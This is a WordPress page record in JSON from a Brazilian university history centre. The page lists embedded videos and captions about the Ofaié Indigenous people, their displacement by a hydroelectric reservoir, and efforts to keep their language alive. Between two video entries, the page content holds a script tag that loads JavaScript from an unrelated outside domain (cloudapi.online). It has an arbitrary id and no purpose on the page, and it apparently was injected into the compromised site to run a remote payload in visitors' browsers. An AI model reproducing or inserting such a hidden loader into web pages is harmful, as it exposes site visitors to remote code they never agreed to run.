{"id":1043,"date":"2017-09-02T09:40:39","date_gmt":"2017-09-02T09:40:39","guid":{"rendered":"http:\/\/www.ndh.ufms.br\/?page_id=1043"},"modified":"2025-11-04T09:37:56","modified_gmt":"2025-11-04T13:37:56","slug":"videos","status":"publish","type":"page","link":"https:\/\/ndh-cptl.ufms.br\/?page_id=1043","title":{"rendered":"V\u00eddeos Ofai\u00e9"},"content":{"rendered":"\n<p>Fontes audiovisuais do Fundo Ofai\u00e9 &#8211; Ata\u00edde Xehit\u00e2-ha no canal do NDH <a href=\"https:\/\/www.youtube.com\/@ndhcptl\" data-type=\"URL\" data-id=\"https:\/\/www.youtube.com\/@ndhcptl\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.youtube.com\/@ndhcptl<\/a><\/p>\n\n\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/uRoErb_BPC8?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p style=\"text-align: justify;\">V\u00eddeo &#8220;Ofai\u00e9-Xavante &#8211; Retrato de um povo&#8221;\u00a0 produzido pelos acad\u00eamicos do curso de Comunica\u00e7\u00e3o Social e Jornalismo da UNIDERP.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/S6dzqa61hmU?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p style=\"text-align: justify;\">Video produzido em 1992 para sensibilizar a dire\u00e7\u00e3o da Companhia Energ\u00e9tica de S\u00e3o Paulo-CESP a adquirir uma \u00e1rea de terra para a transfer\u00eancia dos ind\u00edgenas Ofai\u00e9, do munic\u00edpio de Brasil\u00e2ndia-MS, cujo territ\u00f3rio onde viviam na margem direita do rio Paran\u00e1, no Mato Grosso do Sul, foi inundado pelas \u00e1guas do reservat\u00f3rio da Hidrel\u00e9trica Porto Primavera (atual, Hidrel\u00e9trica engenheiro S\u00e9rgio Motta). V\u00eddeo experimental, educativo, traz a grava\u00e7\u00e3o e depoimento in\u00e9dito do ent\u00e3o cacique da aldeia, Ata\u00edde Francisco Rodrigues (Xehit\u00e2-ha). Trabalho dirigido por Udovaldo Lacava e Geraldo Anhaia Mello com imagens cedidas por Carlos Alberto dos Santos Dutra, Jo\u00e3o Roberto Hipper e Bill Gann.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/qgjEpen4pEw?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p style=\"text-align: justify;\">Reportagem da TV Educativa Mato Grosso do Sul (1999) sobre a situa\u00e7\u00e3o vivida pelos ind\u00edgenas Ofai\u00e9, no munic\u00edpio de Brasil\u00e2ndia-MS. Direitos Autorais da TV Educativa\/MS. Divulga\u00e7\u00e3o concedida apenas para fins de educa\u00e7\u00e3o e pesquisa sem fins lucrativos.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/RoCLldYy8FY?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p style=\"text-align: justify;\">O futebol \u00e9 a forma de resgate da l\u00edngua-m\u00e3e dos ind\u00edgenas Ofai\u00e9. No campo instalado na Reserva Anodi, as atividades s\u00e3o realizadas em idioma nativo, que hoje conta com menos de dez falantes. Al\u00e9m dos Ofai\u00e9, integrantes n\u00e3o-ind\u00edgenas e de outras etnias tamb\u00e9m participam da equipe, como Guarani, Kaiowa.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/JugBdH4wwmo?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p style=\"text-align: justify;\">O Prof. Carlito narra a hist\u00f3ria de Hanto-gr\u00ea e o percurso de sofrimento do povo Ofai\u00e9. Brasil\u00e2ndia-MS, outubro de 2010.<\/p>","protected":false},"excerpt":{"rendered":"<p>Fontes audiovisuais do Fundo Ofai\u00e9 &#8211; Ata\u00edde Xehit\u00e2-ha no canal do NDH https:\/\/www.youtube.com\/@ndhcptl V\u00eddeo &#8220;Ofai\u00e9-Xavante &#8211; Retrato de um povo&#8221;\u00a0 produzido pelos acad\u00eamicos do curso de Comunica\u00e7\u00e3o Social e Jornalismo da UNIDERP. Video produzido em 1992 para sensibilizar a dire\u00e7\u00e3o &hellip; <a href=\"https:\/\/ndh-cptl.ufms.br\/?page_id=1043\">Continue lendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":746,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1043","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/1043","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1043"}],"version-history":[{"count":11,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/1043\/revisions"}],"predecessor-version":[{"id":1499,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/1043\/revisions\/1499"}],"up":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/746"}],"wp:attachment":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1043"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}